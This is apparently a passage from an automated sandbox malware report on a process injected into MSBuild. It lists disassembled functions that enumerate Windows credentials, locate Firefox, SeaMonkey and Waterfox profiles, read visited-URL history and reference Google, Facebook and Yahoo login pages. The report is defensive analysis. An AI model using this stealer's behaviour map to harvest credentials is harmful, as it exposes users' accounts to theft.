Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F

Strings

, xrefs: 0040E1D8
Containers, xrefs: 0040E195
Container_%I64d, xrefs: 0040E246
Name, xrefs: 0040E209
ContainerId, xrefs: 0040E1FC

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 2804212203-2982631422
Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98

Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A

memset.MSVCRT ref: 0040BC75
memset.MSVCRT ref: 0040BC8C
WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D

Strings

, xrefs: 0040BD19

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
String ID:
API String ID: 115830560-3916222277
Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
GetLastError.KERNEL32 ref: 0041847E
free.MSVCRT ref: 0041848B

Strings

|A, xrefs: 00418462

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFile$ErrorLastfree
String ID: |A
API String ID: 77810686-1717621600
Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0041249C
??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
LoadIconW.USER32(00000000,00000065), ref: 0041258B
wcscpy.MSVCRT ref: 004125A0

Strings

r!A, xrefs: 00412477

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$HandleIconLoadModulememsetwcscpy
String ID: r!A
API String ID: 2791114272-628097481
Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6

Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B

Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373

Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB

_wcslwr.MSVCRT ref: 0040C817

Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF

wcslen.MSVCRT ref: 0040C82C

Strings

https://login.yahoo.com/config/login, xrefs: 0040C7C4
/, xrefs: 0040C843
/, xrefs: 0040C838
http://www.facebook.com/, xrefs: 0040C7B7
https://www.google.com/accounts/servicelogin, xrefs: 0040C7AA

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 2936932814-4196376884
Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7

CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
wcslen.MSVCRT ref: 0040BE06
wcsncmp.MSVCRT ref: 0040BE38
memset.MSVCRT ref: 0040BE91
memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
_wcsnicmp.MSVCRT ref: 0040BEFC
wcschr.MSVCRT ref: 0040BF24
LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
String ID:
API String ID: 697348961-0
Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403CBF
memset.MSVCRT ref: 00403CD4
memset.MSVCRT ref: 00403CE9
memset.MSVCRT ref: 00403CFE
memset.MSVCRT ref: 00403D13

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403DDA

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3

Strings

Waterfox\Profiles, xrefs: 00403D40, 00403D5B
Waterfox, xrefs: 00403D73

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Waterfox$Waterfox\Profiles
API String ID: 3527940856-11920434
Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403E50
memset.MSVCRT ref: 00403E65
memset.MSVCRT ref: 00403E7A
memset.MSVCRT ref: 00403E8F
memset.MSVCRT ref: 00403EA4

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403F6B

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3

Strings

Mozilla\SeaMonkey\Profiles, xrefs: 00403ED1, 00403EEC
Mozilla\SeaMonkey, xrefs: 00403F04

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 3527940856-2068335096
Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A

Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403FE1
memset.MSVCRT ref: 00403FF6
memset.MSVCRT ref: 0040400B
memset.MSVCRT ref: 00404020
memset.MSVCRT ref: 00404035

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 004040FC

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3

Strings

Mozilla\Firefox\Profiles, xrefs: 00404062, 0040407D
Mozilla\Firefox, xrefs: 00404095

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 3527940856-3369679110
Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A

Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3

Strings

no such vfs: %s, xrefs: 0044452B
NOCASE, xrefs: 004445A4
main, xrefs: 00444613
temp, xrefs: 00444623
BINARY, xrefs: 0044454A, 0044454F, 0044455B, 00444567, 0044458C
RTRIM, xrefs: 00444573

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99

Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A

Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA

memset.MSVCRT ref: 004033B7
memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
wcscmp.MSVCRT ref: 004033FC
_wcsicmp.MSVCRT ref: 00403439

Strings

0.@, xrefs: 00403399
, xrefs: 004032DF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
String ID: $0.@
API String ID: 2758756878-1896041820
Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B

Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 2941347001-0
Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C

Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403C09
memset.MSVCRT ref: 00403C1E

Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732

wcscat.MSVCRT ref: 00403C47

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

wcscat.MSVCRT ref: 00403C70

Strings

Mozilla\Firefox\Profiles, xrefs: 00403C6A
Mozilla\Profiles, xrefs: 00403C41

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memsetwcscat$Closewcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 3249829328-1174173950
Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9

Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A824
GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
wcscpy.MSVCRT ref: 0040A854
wcscat.MSVCRT ref: 0040A86A
LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 669240632-0
Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA

Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00414458
_snwprintf.MSVCRT ref: 0041447D
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3

Strings

"%s", xrefs: 0041446C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58

Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2

Strings

GetProcessTimes, xrefs: 00413CBF
kernel32.dll, xrefs: 00413CB0

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99

Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004087D6

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC

memset.MSVCRT ref: 00408828
memset.MSVCRT ref: 00408840
memset.MSVCRT ref: 00408858
memset.MSVCRT ref: 00408870
memset.MSVCRT ref: 00408888

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
String ID:
API String ID: 2911713577-0
Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9

Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299

Strings

@ , xrefs: 0041F293
SQLite format 3, xrefs: 0041F220

Memory Dump Source

